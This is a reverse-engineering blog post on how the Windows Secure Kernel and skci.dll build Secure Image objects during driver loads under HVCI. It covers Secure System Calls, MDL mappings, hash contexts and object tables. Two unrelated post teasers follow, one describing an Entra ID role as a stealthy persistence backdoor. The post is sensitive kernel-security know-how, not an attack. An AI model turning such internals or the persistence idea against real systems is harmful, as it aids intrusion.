Given the lack of debugging capabilities for securekernel.exe, lack of user-defined types (UDTs) in the securekernel.exe symbols, and overall lack of public information, there is no way (as we will see) I will be able to completely map Secure Image objects back to absolute structure definitions (and the same goes with NAR/NTEs). This blog (and subsequent ones) are really just analysis posts outlining things such as Secure System Calls, functionality, the reverse engineering methodology I take, etc. I am not an expert on this subject matter (like Andrea, Satoshi Tanda, or others) and mainly writing up my analysis for the sheer fact there isn’t too much information out there on these subjects and I also greatly enjoy writing long-form blog posts. With that said, the “song-and-dance” performed between NT and Secure Kernel to load images/share resources/etc. is a very complex (in my mind) topic. The terms I use are based on the names of the functions, and may differ from the actual terms as an example. So please feel free to reach out with improvements/corrections. Lastly, Secure Image objects can be created for other images other than drivers. We will be focusing on driver loads. With this said, I hope you enjoy!

SECURE_IMAGE Overview

Windows Internals, 7th Edition, Chapter 9 gives a brief mention of SECURE_IMAGE objects:

…The NAR contains some information of the range (such as its base address and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers (in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated by the NT memory manager as private pages that contain executable code…

As we know with HVCI (at the risk of being interpreted as pretentious, which is not my intent, I have linked my own blog post), VTL 1 is responsible for enforcing W^X (write XOR execute, meaning WX memory is not allowed). Given that drivers can be dynamically loaded at anytime on Windows, VTL 0 and VTL 1 need to work together in order to ensure that before such drivers are actually loaded, the Secure Kernel has the opportunity to apply the correct safeguards to ensure the new driver isn’t used, for instance, to load unsigned code. This whole process starts with the creation of the Secure Image object.

This is required because the Secure Kernel needs to monitor access to some of the memory present in VTL 0, where “normal” drivers live. Secure Image objects allow the Secure Kernel to manage the state of these runtime drivers. Managing the state of these drivers is crucial to enforcing many of the mitigations provided by virtualization capabilities, such as HVCI. A very basic example of this is when a driver is being loaded in VTL 0, we know that VTL 1 needs to create the proper Second Layer Address Translation (SLAT) protections for each of the given sections that make up the driver (e.g., the .text section should be RX, .data RW, etc.). In order for VTL 1 to do that, it would likely need some additional information and context, such as maybe the address of the entry point of the image, the number of PE sections, etc. - this is the sort of thing a Secure Image object can provide - which is much of the needed context that the Secure Kernel needs to “do its thing”.

This whole process starts with code in NT which, upon loading runtime drivers, results in NT extracting the headers from the image being loaded and sending this information to the Secure Kernel in order to perform the initial header verification and build out the Secure Image object.

I want to make clear again - although the process for creating a Secure Image object may start with what we are about to see in this blog post, even after the Secure System Call returns to VTL 0 in order to create the initial object, there is still a “song-and-dance” performed by ntoskrnl.exe, securekernel.exe, and skci.dll. This specific blog does not go over this whole “song-and-dance”. This blog will focus on the initial steps taken to get the object created in the Secure Kernel. In future blogs we will look at what happens after the initial object is created. For now, we will just stick with the initial object creation.

A Tiny Secure System Call Primer

Secure Image object creation begins through a mechanism known as a Secure System Call. Secure System Calls work at a high-level similarly to how a traditional system call works:

  1. An untrusted component (NT in this case) needs to access a resource in a privileged component (Secure Kernel in this case)
  2. The privileged component exposes an interface to the untrusted component
  3. The untrusted component packs up information it wants to send to the privileged component
  4. The untrusted component specifies a given “call number” to indicate what kind of resource it needs access to
  5. The privileged component takes all of the information, verifies it, and acts on it

A “traditional” system call will result in the emission of a syscall assembly instruction, which performs work in order to change the current execution context from user-mode to kernel-mode. Once in kernel-mode, the original request reaches a specified dispatch function which is responsible for servicing the request outlined by the System Call Number. Similarly, a Secure System Call works almost the same in concept (but not necessarily in the technical implementation). Instead of syscall, however, a vmcall instruction is emitted. vmcall is not specific to the Secure Kernel and is a general opcode in the 64-bit instruction set. A vmcall instruction simply allows guest software (in our case, as we know from HVCI, VTL 0 - which is where NT lives - is effectively treated as “the guest”) to make a call into the underlying VM monitor/supervisor (Hyper-V). In other words, this results in a call into Secure Kernel from NT.

The NT function nt!VslpEnterIumSecureMode is a wrapper for emitting a vmcall. The thought process can be summed up, therefore, as this: if a given function invokes the nt!VslpEnterIumSecureMode function in NT, that caller of said function is responsible (generally speaking mind you) of invoking a Secure System Call.

Although performing dynamic analysis on the Secure Kernel is difficult, one thing to note here is that the order the Secure Systm Call arguments are packed and shipped to the Secure Kernel is the same order the Secure Kernel will operate on them. So, as an example, the function nt!VslCreateSecureImageSection is one of the many functions in NT that results in a call to nt!VslpEnterIumSecureMode.

The Secure System Call Number, or SSCN, is stored in the RDX register. The R9 register, although not obvious from the screenshot above, is responsible for storing the packed Secure System Call arguments. These arguments are packed in the form of a in-memory typedef struct structure (which we will look at later).

On the Secure Kernel side, the function securekernel!IumInvokeSecureService is a very large function which is the “entry point” for Secure System Calls. This contains a large switch/case statement that correlates a given SSCN to a specific dispatch function handler. The exact same order these arguments are packed is the exact same order they will be unpacked and operated on by the Secure Kernel (in the screenshot below, a1 is the address of the structure, and we can see how various offsets are being extracted from the structure, which is due to struct->Member access).

Now that we have a bit of an understanding here, let’s move on to see how the Secure System Call mechanism is used to help Secure Kernel create a Secure Image object!

SECURE_IMAGE (Non-Comprehensive!) Creation Overview

Although by no means is this a surefire way to identify this data, a method that could be employed to locate the functionality for creating Secure Image objects is to just search for terms like SecureImage in the Secure Kernel symbols. Within the call to securekernel!SkmmCreateSecureImageSection we see a call to an externally-imported function, skci!SkciCreateSecureImage.

This means it is highly likely that securekernel!SkmmCreateSecureImageSection is responsible for accepting some parameters surrounding the Secure Image object creation and forwarding that on to skci!SkciCreateSecureImage. Focusing our attention on securekernel!SkmmCreateSecureImageSection we can see that this functionality (securekernel!SkmmCreateSecureImageSection) is triggered through a Secure System Call with an SSCN of 0x19 (the screenshot below is from the securekernel!IumInvokeSecureService Secure System Call dispatch function).

Again, by no means is this correct in all cases, but I have noticed that most of the time when a Secure System Call is issued from ntoskrnl.exe, the corresponding “lowest-level function”, which is responsible for invoking nt!VslpEnterIumSecureMode, has a similar name to the associated sispatch function in securekernel.exe which handles the Secure System Call. Luckily this applies here and the function which issues the SSCN of 0x19 is the nt!VslCreateSecureImageSection function.

Based on the call stack here, we can see that when a new section object is created for a target driver image being loaded, the ci.dll module is dispatched in order to determine if the image is compatible with HVCI (if it isn’t, STATUS_INVALID_IMAGE_HASH is returned). Examining the parameters of the Secure System Call reveals the following.

Note that at several points I will have restarted the machine the analysis was performed on and due to KASLR the addresses will change. I will provide enough context in the post to overcome this obstacle.

With Secure System Calls, the first parameter (seems to be) always 0 and/or reserved. This means the arguments to create a Secure Image object are packed as follows.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID VirtualAddress;
    PVOID PageFrameNumber;
    bool Unknown;
    ULONG Unknown;
    ULONG Unknown1;
} SECURE_IMAGE_CREATE_ARGS;

As a small point of contention, I know that the page frame number is such because I am used to dealing with looking into memory operations that involve both physical and virtual addresses. Anytime I see I am dealing with some sort of lower-level concept, like loading a driver into memory and I see a value that looks like a ULONG paired with a virtual address, I always assume this could be a PFN. I always assume this further in cases especially when the ULONG value is not aligned. A physical memory address is simply (page frame number * 0x1000), plus any potential offset. Since there is not 0 or 00 at the end of the address, this tells me that this is the page frame number. This is not a “sure” method to do this, but I will show how I validated this below.

At first, I was pretty stuck on what this first virtual address was used for. We previously saw the call stack which is responsible for invoking nt!VslCreateSecureImageSection. If you trace execution in IDA, however, you will quickly see this call stack is a bit convoluted as most of the functions called are called via function pointer as an input parameter from other functions making tracing the arguments a bit difficult. Fortunately, I saw that this virtual address was used in a call to securekernel!SkmmMapDataTransfer almost immediately within the Secure System Call handler function (securekernel!SkmmCreateSecureImageSection). Note although IDA is annotated a bit with additional information, we will get to that shortly.

It seems this function is actually publicly-documented thanks to Saar Amar and Daniel King’s BlackHat talk! This actually reveals to us that the first argument is an MDL (Memory Descriptor List) while the second parameter, which is PageFrameNumber, is a page frame number which we don’t know its use yet.

According to the talk, securekernel.exe tends to use MDLs, which are provided by VTL 0, for cases where data may need to be accessed by VTL 1. By no means is this an MDL internals post, but I will give a brief overview quickly. An MDL (nt!_MDL) is effectively a fixed-sized header which is prepended to a variable-length array of page frame numbers (PFNs). Virtual memory, as we know, is contiguous. The normal size of a page on Windows is 4096, or 0x1000 bytes. Using a contrived example (not taking into account any optimizations/etc.), let’s say a piece of malware allocated 0x2000 bytes of memory and stored shellcode in that same allocation. We could expect the layout of memory to look as follows.

We can see in this example the shellcode spans the virtual pages 0x1ad2000 and 0x1ad3000. However, this is the virtual location, which is contiguous. In the next example, the reality of the situation creeps in as the physical pages which back the shellcode are in two separate locations.

An MDL would be used in this case to describe the physical layout of the memory of a virtual memory region. The MDL is used to say “hey I have this contiguous buffer in virtual memory, but here are the physical non-contiguous page(s) which describe this contiguous range of virtual memory”.

MDLs are also typically used for direct memory access (DMA) operations. DMA operations don’t have the luxury of much verification, because they need to access data quickly (think UDP vs TCP). Because of this an MDL is used because it typically first locks the memory range described into memory so that the DMA operation doesn’t ever access invalid memory.

One of the main features of an MDL is that it allows multiple mappings for the given virtual address a given MDL described (the StartVa is the beginning of the virtual address range the MDL describes). For instance, consider an MDL with the following layout: a user-mode buffer is described by an MDL’s StartVa. As we know, user-mode addresses are only valid within the process context of which they reside (and the address space is per-process based on the current page table directory loaded into the CR3 register). Let’s say that a driver, which is in an arbitrary context needs to access the information in the user-mode buffer contained in Mdl->StartVa. If the driver goes to access this, and the process context is processA.exe but the address was only valid in processB.exe, you are accessing invalid memory and you would cause a crash.

An MDL allows you, through the MmGetSystemAddressForMdlSafe API, to actually request that the system map this memory into the system address space, from the non-paged pool. This allows us to access the contents of the user-mode buffer, through a kernel-mode address, in an arbitrary process context.

Now, using that knowledge, we can see that the exact same reason VTL 0 and VTL 1 use MDLs! We can think of VTL 0 as the “user-mode” portion, and VTL 1 as the “kernel-mode” portion, where VTL 0 has an address with data that VTL 1 wants. VTL 1 can take that data (in the form of an MDL) and map it into VTL 1 so it can safely access the contents of memory described by the MDL.

Taking a look back at how the MDL looks, we can see that StartVa, which is the buffer the MDL describes, is some sort of base address. We can confirm this is actually the base address of an image being loaded because it contains nt!_IMAGE_DOS_HEADER header (0x5a4d is the magic (MZ) for a PE file and can be found in the beginning of the image, which is what a kernel image is).

However, although this looks to be the “base image”, based on the alignment of Mdl->StartVa, we can see quickly that ByteCount tells us only the first 0x1000 bytes of this memory allocation are accessible via this MDL. The ByteCount of an MDL denotes the size of the range being described by the MDL. Usually the first 0x1000 bytes of an image are reserved for all of the headers (IMAGE_DOS_HEADER, IMAGE_FILE_HEADER, etc.). If we recall the original call stack (provided below for completeness) we can actually see that the NT function nt!SeValidateImageHeader is responsible for redirecting execution to ci.dll (which eventually results in the Secure System Call). This means in reality, although the StartVa is aligned to look like a base address, we are really just dealing with the headers of the target image at this point. Even though the StartVa is aligned like a base address, the fact of the matter is the actual address is not relevant to us - only the headers are.

As a point of contention before we move on, we can do basic retroactive analysis based on the call stack to clearly see that the image has only been mapped into memory. It has not been fully loaded - and only the initial section object that backs the image is present in virtual memory. As we do more analysis in this post, we will also verify this to be the case with actual data that shows many of the default values in the headers, from disk, haven’t been fixed up (which normally happens when the image is fully loaded).

Great! Now that we know this first paramter is an MDL that contains the image headers, the next thing that needs to happen is for securekernel.exe to figure out how to safely access the contents region described by the MDL (which are the headers).

The first thing that VTL 1 will do is take the MDL we just showed, provided by VTL 0, and creates a new MDL in VTL 1 that describes the provided MDL from VTL 0. In other words, the new MDL will be laid out as follows.

Vtl1CopyOfVtl0Mdl->StartVa = page_aligned_address_mdl_starts_in;
Vtl1CopyOfVtl0Mdl->ByteOffset = offset_from_page_aligned_address_to_actual_address;

MDLs usually work with a page-aligned address as the base, and any offset in ByteOffset. This is why the VTL 0 MDL is address is first page-aligned (Vtl0Mdl & 0xFFFFFFFFFFFFF000), and the offset to the MDL in the page is set in ByteOffset.

Additionally, from the previous image, we can now realize what the first page frame number used in our Secure System Call parameters is used for. This is the PFN which corresponds to the MDL (the parameter PfnOfVtl0Mdl). We can validate this in WinDbg.

We know that a physical page of memory is simply (page frame number * PAGE_SIZE + any offset). Although we can see in the previous screenshot that the contents of memory for the page-aligned address of the MDL and the physical memory correspond, if we add the page offset (0x250 in this case) we can clearly see that there is no doubt this is the PFN for the VTL 0 MDL. We can additionally see that for the PTE of the VTL0 MDL the PFNs align!

This MDL, after construction, has StartVa mapped into VTL 1. At this point, for all intents and purposes, vtl1MdlThatDescribesVtl0Mdl->MappedSystemVa contains the VTL 1 mapping of the VTL 0 MDL! All integrity checks are then performed on the MDL.

VTL 1 has now mapped the VTL 0 MDL (using another MDL). MappedSystemVa is now a pointer to the VTL 1 mapping of the VTL 0 MDL, and the integrity checks now occur on this new mapping, instead of directly operating on the VTL 0 MDL. After confirming the VTL 0 MDL contains legitimate data (the large if statement in the screenshot below), another MDL (not the MDL from VTL 0, not the MDL created by VTL 1 to describe the MDL from VTL 0, but a third, new MDL) is created. This MDL will be an actual copy of the now verified contents of the VTL 0 MDL. In otherwords, thirdNewMDl->StartVa = StartAddressOfHeaders (which is start of the image we are dealing with in the first place to create a securekernel!_SECURE_IMAGE structure).

We can now clearly see that since VTL 1 has created this new MDL, the page frame number (PFN) of the VTL 0 MDL was provided since a mapping of virtual memory is simply just creating another virtual page which is backed by a common physical page. When the new MDL is mapped, the Secure Kernel can then use NewMdl->MappedSystemVa to safely access, in the Secure Kernel virtual address space, the header information provided by the MDL from VTL 0.

The VTL 1 MDL, which is mapped into VTL 1 and has now had all contents verified. We now return back to the original caller where we started in the first place - securekernel!SkmmCreateSecureImageSection. This then allows VTL 1 to have a memory buffer where the contents of the image from VTL 0 resides. We can clearly see below this is immediately used in a call to RtlImageNtHeaderEx in order to validate that the memory which VTL 0 sent in the first place contains a legitimate image in order to create a securekernel!_SECURE_IMAGE object. It is also at this point that we determine if we are dealing with the 32-bit or 64-bit architecture.

More information is then gathered, such as the size of the optional headers, the section alignment, etc. Once this information is flushed out, a call to an external function SkciCreateSecureImage is made. Based on the naming convention, we can infer this function resides in skci.dll.

We know in the original Secure System Call that the second parameter is the PFN which backs the VTL 0 MDL. UnknownUlong and UnknownUlong1 here are the 4th and 5th parameters, respectively, passed to securekernel!SkmmCreateSecureImageSection. As of right now we also don’t know what they are. The last value I noticed was consistently this 0x800c constant across multiple calls to securekernel!SkmmCreateSecureImageSection.

Opening skci.dll in IDA, we can examine this function further, which seemingly is responsible for creating the secure image.

Taking a look into this function a bit more, we can see this function doesn’t create the object itself but it creates a “Secure Image Context”, which on this build of Windows is 0x110 bytes in size. The first function called in skci!SkciCreateSecureImage is skci!HashKGetHashLength. This is a very simple function, and it accepts two parameters - one an input and one an output or return. The input parameter is our last Secure System Call parameter, which was 0x800C.

Although IDA’s decompilation here is a bit confusing, what this function does is look for a few constant values - one of the options is 0x800C. If the value 0x800C is provided, the output parameter (which is the hash size based on function name and the fact the actual return value is of type NTSTATUS) is set to 0x20. This effectively insinuates that since obviously 0x800C is not a 0x20 byte value, nor a hash, that 0x800C must instead refer to a type of hash which is likely associated with an image. We can then essentially say that the last Secure System Call parameter for secure image creation is the “type” of hash associated with this image. In fact, looking at cross references to this function reveals that the function skci!CiInitializeCatalogs passes the parameter skci!g_CiMinimumHashAlgorithm as the first parameter to this function - meaning that the first parameter actually specifies the hash algorithm.

After calculating the hash size, the Secure Image Context is then built out. This starts by obtaining the Image Headers (nt!_IMAGE_NT_HEADERS64) headers for the image. Then the Secure Image Context is allocated from the pool and initialized to 0 (this is how we know the Secure Image Context is 0x110 bytes in size). The various sections contained in the image are used to build out much of the information tracked by the Secure Image Context.

Note that UnknownULong1 was updated to ImageSize. I wish I had a better way to explain as to how I identified this, but in reality it happenstance as I was examining the optional headers I realized I had seen this value before. See the image below to validate that the value from the Secure System Call arguments corresponds to SizeOfImage.

One thing to keep in mind here is a SECURE_IMAGE object is created before ntoskrnl.exe has had a chance actually perform the full loading of the image. At this point the image is mapped into virtual memory, but not loaded. We can see this by examining the nt!_IMAGE_NT_HEADERS64 structure and seeing that ImageBase in the nt!_IMAGE_OPTIONAL_HEADER64 structure is still set to a generic 0x1c0000000 address instead of the virtual address which the image is currently mapped (because this information has not yet been updated as part of the loading process).

Next in the Secure Image Context creation functionality, the Secure Kernel locates the .rsrc section of the image and the Resource Data Directory. This information is used to calculate the file offset to the Resource Data Directory and also captures the virtual size of the .rsrc section.

After this skci!SkciCreateSecureImage will, if the parameter we previously identified as UnknownBool is set to true, allocate some pool memory which will be used in a call to skci!CiCreateVerificationContextForImageGeneratedPageHashes. This infers to us the “unknown bool” is really an indicator whether or not to create the Verification Context. A context, in this instance, refers to some memory (usually in the form of a structure) which contains information related to the context in which something was created, but wouldn’t be available later otherwise.

The reader should know - I asked Andrea a question about this. The answer here is that a file can either be page-hashed or file-hashed signed. Although the bool gates creating the Verification Context, it is more aptly used to describe if a file is file-hashed or page-hashed. If the image is file-hashed signed, the Verification Context is created. For page-hashed files there is no need for the additional context information (we will see why shortly).

This begs the question - how do we know if we are dealing with a file that was page-hashed signed or file-hash signed? Taking a short detour, this starts in the initial section object creation (nt!MiCreateNewSection). During this time a bitmask, based on the parameters surrounding the creation of the section object that will back the loaded driver is formed. A partially-reversed CREATE_SECTION_PACKET structure from my friend Johnny Shaw outlines this. Packet->Flags is one of the main factors that dictates how this new bitmask is formulated. In the case of the analysis being done in this blog post, when bit 21 (PacketFlags & 0x100000) and when bit 6 (PacketFlags & 0x20) are set, we get the value for our new mask - which has a value of 0x40000001. This bitmask is then carried through to the header validation functions, as seen below.

This bitmask will finally make its way to ci!CiGetActionsForImage. This call, as the name infers, returns another bitmask based on our 0x40000001 bitmask. The caller of ci!CiGetActionsForImage is ci!CiValidateImageHeader. This new returned bitmask gives instructions to the header validation function as to what actions to take for validation.

As previous art shows, depending on the bitmask returned the header validation is going to be done via page hash validation, or file hash validation by supplying a function pointer to the actual validation function.

The two terms (page-hash signed and file-hash signed) can be very confusing - and there is very little information about them in the wild. A file-hashed file is one that has the entire contents of the file itself hashed. However, we must consider things like a driver being paged out and paged in. When an image is paged in, for instance, it needs to be validated. Images in this case are always verified using page hashes, and never file hashes (I want to make clear I only know the following information because I asked Andrea). Because a file-hashed file would not have page hash information available (obviously since it is “file-hashed”), skci.dll will create something called a “Page Hash Context” (which we will see shortly) for file-hashed images so that they are compatible with the requirement to verify information using page hashes.

As a point of contention, this means we have determined the arguments used for a Secure Image Secure System Call.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID Vtl0MdlImageHeaders;
    PVOID PageFrameNumberForMdl;
    bool ImageeIsFileHashedCreateVerificationContext;
    ULONG ImageSize;
    ULONG HashAlgorithm;
} SECURE_IMAGE_CREATE_ARGS;

Moving on, the first thing this function (since we are dealing with a file-hashed image) does is actually call two functions which are responsible for creating additional contexts - the first is an “Image Hash Context” and the second is a “Page Hash Context”. These contexts are stored in the main Verification Context.

skci!CiCreateImageHashContext is a relatively small wrapper that simply takes the hashing algorithm passed in as part of the Secure Image Secure System Call (0x800C in our case) and uses this in a call to skci!SymCryptSha256Init. skci!SymCryptSha256Init takes the hash algorithm (0x800C) and uses it to create the Image Hash Context for our image (which really isn’t so much a “context” as it mainly just contains the size of the hash and the hashing data itself).

The Page Hash Context information is only produced for a file-hashed image. Otherwise file-hashed images would not have a way to be verified in the future as only page hashes are used for verification of the image. Page Hash Context are slightly more involved, but provide much of the same information. skci!CiCreatePageHashContextForImageMapping is responsible for creating this context and VerificationContext_Offset_0x108 stores the actual Page Hash Context.

The Page Hash Context logic begins by using SizeOfRawData from each of the section headers (IMAGE_SECTION_HEADER) to iterate over of the sections available in the image being processed and to capture how many pages make up each section (determines how many pages make up all of the sections of the image).

This information, along with IMAGE_OPTIONAL_HEADER->SizeOfHeaders, the size of the image itself, and the number of pages that span the sections of the image are stored in the Page Hash Context. Additionally, the Page Hash Context is then allocated based on the size of the sections (to ensure enough room is present to store all of the needed information).

After this, the Page Hash Context information is filled out. This begins by only storing the first page of the image in the Page Hash Context. The rest of the pages in each of the sections of the target image are filled out via skci!SkciValidateImageData, which is triggered by a separate Secure System Call. This comes at a later stage after the current Secure System Call has returned but before we have left the original nt!MiCreateNewSection function. We will see this in a future blog post.

Now that the initial Verification Context (which contains also the Page Hash and Image Hash Contexts) have been created (but as we know will be updated with more information later), skci!SkciCreateSecureImage will then sort and copy information from the Image Section Headers and store them in the Verification Context. This function will also calculate the file offset for the last section in the image by computing PointerToRawData + SizeOfRawData in the skci!CiGetFileOffsetAfterLastRawSectionData function.

After this, the Secure Image Context creation work is almost done. The last thing this function does is compute the hash of the first page of the image and stores it in the Secure Image Context directly this time. This also means the Secure Image Context is returned by the caller of skci!SkciCreateSecureImage, which is the Secure Kernel function servicing the original Secure System Call.

Note that previously we saw skci!CiAddPagesToPageHashContext called within skci!CiCreatePageHashContextForImageMapping. In the call in the above image, the fourth parameter is SizeOfHeaders, but in the call within skci!CiCreatePageHashContextForImageMapping the parameter was MdlByteCount - which is the ByteCount provided earlier by the MDL in the Secure System Call arguments. In our case, SizeOfHeaders and the ByteCount are both 0x1000 - which infers that when the MDL is constructured, the ByteCount is set to 0x1000 based on the SizeOfHeaders from the Optional Header. This validates what we mentioned at the beginning of the blog where although the “base address” is used as the first Secure System Call parameter, this could be more specifically referred to as the “headers” for the image.

The Secure Kernel maintains a table of all active Secure Images that are known. There are two very similar tables, which are used to track threads and NARs (securekernel!SkiThreadTable/securekernel!SkiNarTable). These are of type “sparse tables”. A sparse table is a computer science concept that effectively works like a static array of data, but instead of it being unordered the data is ordered which allows for faster lookups. It works by supporting 0x10000000, or 256,000 entries. Note that these entries are not all allocated at once, but are simply “reserved” in the sense that the entries that are not in use are not mapped.

Secure Images are tracked via the securekernel!SkmiImageTable symbol. This table, as a side note, is initialized when the Secure Kernel initializes. The Secure Pool, the Secure Image infrastructure, and the Code Integrity infrastructure are initialized after the kernel-mode user-shared data page is mapped into the Secure Kernel.

The Secure Kernel first allocates an entry in the table where this Secure Image object will be stored. To calculate the index where the object will be stored, securekernel!SkmmAllocateSparseTableEntry is called. This creates a sizeof(ULONG_PTR) “index” structure. This determines the index into the table where the object is stored. In the case of storing a new entry, on 64-bit, the first 4 bytes provide the index and the last 4 bytes are unused (or, if they are used, I couldn’t see where). This is all done back in the original function securekernel!SkmmCreateSecureImageSection, after the function which creates the Secure Image Context has returned.

As we can also see above, this is where our actual Secure Image object is created. As the functionality of securekernel!SkmmCreateSecureImageSection continues, this object will get filled out with more and more information. Some of the first data collected is if the image is already loaded in a valid kernel address. From the blog earlier, we mentioned the Secure Image loading occurs when an image is first mapped but not loaded. This seems to infer it is possible for a Secure Image to be at least already loaded at a valid kernel-mode address. If it is loaded, a bitwise OR happens with a mask of 0x1000 to indicate this. The entry point of the image is captured, and the previously-allocated Secure Image Context data is saved. Also among the first information collected is the Virtual Address and Size of the Load Config Data Directory.

The next items start by determining if the image being loaded is characterized as a DLL (this is technically possible, for example, ci.dll is loaded into kernel-mode) by checking if the 13th bit is set in the FileHeader.Characteristics bitmask.

After this, the Secure Image creation logic will create an allocation based on the size of the image from NtHeaders->OptionalHeader->SizeOfImage. This allocation is not touched again during the initialization logic.

At this point, for each of the sections in the image, the prototype PTEs for the image (via securekernel!SkmiPopulateImagePrototypes) are populated. If you are not familiar, when a shared memory region is shared for, as an example, between two-processes an issue arises at the PTE level. A prototype PTE allows easily for the memory manager to track pages that are shared between two processes. As even Windows Internals, 7th Edition, Part 1, Chapter 5 states - prototype PTEs are created for a pagefile-backed section object when it is first created. The same this effectively is happening here, but instead of actually creating the prototype PTEs (because this is done in VTL 0), the Secure Kernel now obtains a pointer to the prototype PTEs.

After this, additional section data and relocation information for the image is captured. This first starts by checking if the relocation information is stripped and, if the information hasn’t been stripped, the code captures the Image Data Directory associated with relocation information.

The next thing that occurs is, again, each of the present sections is iterated over. This is done to capture some important information about each section in a memory allocation that is stored in the Secure Image object. Specifically here, relocation information is being processed. The Secure Image object creation logic will first allocate some memory in order to store the Virtual Address page number, size of the raw data in number of pages, and pointer to raw data for the section header that is currently being processed. As a part of each check, the logic determines if the relocation table falls within the range of the current section. If it does, the file offset to the relocation table is calculated and stored in the Secure Image object.

Additionally, we saw previously that if the relocation information was stripped out of the image, the Secure Image object (at offset 0x50 and 0x58) were updated with values of false and true, 0 and 1, respectively. This seems to indicate why the relocation information may not be present. In this case, however, if the relocation information wasn’t stripped but there legitimately was no relocation information available (the Image Data Directory entry for the relocation data was zero), these boolean values are updated to true and false, 1 and 0, respectively. This would seem to indicate to the Secure Image object why the relocation information may or may not be present.

The last bits of information the Secure Image object creation logic processes are:

  1. Is the image being processed a 64-bit executable image or are the number of data directories at least 10 decimal in amount to support the data directory we want to capture? If not, skip step 2.
  2. If the above is true, allocate and fill out the “Dynamic Relocation Data”

As a side-note, I only determines the proper name for this data is “Dynamic Relocation Data” because of the routine securekernel!SkmiDeleteImage - which is responsible for deleting a Secure Image object when the object’s reference count reaches 0 (after we get through this last bit of information that is processed, we will talk about this routine in more detail). In the securekernel!SkmiDeleteImage logic, a few pointers in the object itself are checked to see if they are allocated. If they are, they are freed (this makes sense, as we have seen there have been many more memory allocations than just the object itself). SecureImageObject + 0xB8 is checked as a place in the Secure Image object that is allocated. If the allocation is present, a function called securekernel!SkmiFreeDynamicRelocationInfo is called to presumably free this memory.

This would indicate that the “Dynamic Relocation Data” is being created in the Secure Image object creation logic.

The information captured here refers to the load configuration Image Data Directory. The information about the load config data is verified, and the virtual address and size are captured and stored in the Secure Image object. This makes sense, as the dynamic relocation table is just the load config directory of an executable.

This is the last information the Secure Image object needs for the initialization (we know more information will be collected after this Secure System Call returns)! Up until this point, the last parameter we haven’t touched in the securekernel!SkmmCreateSecureImageSection function is the last parameter, which is actually an output parameter. The output parameter here is filled with the results of a call to securekernel!SkobCreateHandle.

If we look back at the initial Secure System Call dispatch function, this output parameter will be stored in the original Secure System Call arguments at offset 0x10 (16 decimal)

This handle is also stored in the Secure Image object itself. This also infers that when a Secure Image object is created, a handle to the object is returned to VTL 0/NT! This handle is eventually stored in the control area for the section object which backs the image (in VTL 0) itself. This is stored in ControlArea->u2.e2.SeImageStub.StrongImageReference.

Note that this isn’t immediately stored in the Control Area of the section object. This happens later, as we will see in a subsequent blog post, but it is something at least to note here. As another point of contention, the way I knew this handle would eventually be stored here is because when I was previously doing analysis on NAR/NTE creation, which we will eventually talk about, this handle value was the first parameter passed as part of the Secure System Call.

This pretty much sums up the instantiation of the initial Secure Image object. The object is now created but not finalized - much more data still needs to be validated. Because this further validation happens after the Secure System Call returns, I will put that analysis into another blog post. The future post we will look at what ntoskrnl.exe, securekernel.exe, and skci.dll do with this object after the initial creation before the image is actually loaded fully into VTL 0. Before we close the blog post, it is worth taking a look the object itself and how it is treated by the Secure Kernel.

Secure Image Objects - Now What?

After the Secure Image object is created, the “clean-up” code for the end of the function (securekernel!SkmmCreateSecureSection) dereferences the object if the object was created but failure occured during the setting up of the initial object. Notice that the object is dereferenced at 0x20 bytes before the actual object address.

What does this mean? Objects are prepended with a header that contains metadata about the object itself. The reference count for an object, historically, on Windows is contained in the object header (for the normal kernel this is nt!_OBJECT_HEADER). This tells us that each object managed by the Secure Kernel has a 0x20 byte header! Taking a look at securekernel!SkobpDereferenceObject we can clearly see that within this header the reference count itself is stored at offset 0x18. We can also see that there is an object destructor, contained in the header itself.

Just like regular NT objects, there is a similar “OBJECT_TYPE” setup (nt!PsProcessType, nt!PsThreadType, etc.). Taking a look at the image below, securekernel!SkmiImageType is used when referring to Secure Image Objects.

Existing art denotes that this object type pointer (securekernel!SkmiImageType) contains the destructor and size of the object. This can be corroborated by the interested reader by opening securekernel.exe as data in WinDbg (windbgx -z C:\Windows\system32\securekernel.exe) and looking at the object type directly. This reveals that for the securekernel!SkmiImageType symbol there is an object destructor and, as we saw earlier with the value 0xc8, the size of this type of object.

The following are a list of most of the valid objects in the Secure Kernel I located (although it is unclear without further analysis what many of them are used for):

  1. Secure Image Objects (securekernel!SkmiImageType)
  2. Secure HAL DMA Enabler Objects (securekernel!SkhalpDmaEnablerType)
  3. Secure HAL DMA Mapping Objects (securekernel!SkhalpDmaMappingType)
  4. Secure Enclave Objects (securekernel!SkmiEnclaveType)
  5. Secure Hal Extension Object (securekernel!SkhalExtensionType)
  6. Secure Allocation Object (securekernel!SkmiSecureAllocationType)
  7. Secure Thread Object (securekernel!SkeThreadType)
  8. Secure Shadow Synchronization Objects (events/semaphores) (securekernel!SkeShadowSyncObjectType)
  9. Secure Section Object (securekernel!SkmiSectionType)
  10. Secure Process Object (securekernel!SkpsProcessType)
  11. Secure Worker Factory Object (securekernel!SkeWorkerFactoryObjectType)
  12. Secure PnP Device Object (securekernel!SkPnpSecureDeviceObjectType)

Additional Resources

Legitimately, at the end of the analysis I did for this blog, I stumbled across these wonderful documents titled “Security Policy Document”. They are produced by Microsoft for FIPS (The Federal Information Processing Standard). They contains some additional insight into SKCI/CI. Additional documents on other Windows technologies can be found here.

Conclusion

I hope the reader found at least this blog to not be so boring, even if it wasn’t informational to you. As always, if you have feedback please don’t hesitate to reach out to me. I would also like to thank Andrea Allievi for answering a few of my questions about this blog post! I did not ask Andrea to review every single aspect of this post (so any errors in this post are completely mine). If, again, there are issues identified please reach out to me so I can make edits!

Peace, love, and positivity!

Improved Guidance for Azure Network Service Tags

Summary Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose.

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID

Summary

The “Directory Synchronization Accounts” Entra role is very powerful (allowing privilege escalation to the Global Administrator role) while being hidden in Azure portal and Entra admin center, in addition to being poorly documented, making it a perfect stealthy backdoor for persistence in Entra ID 🙈

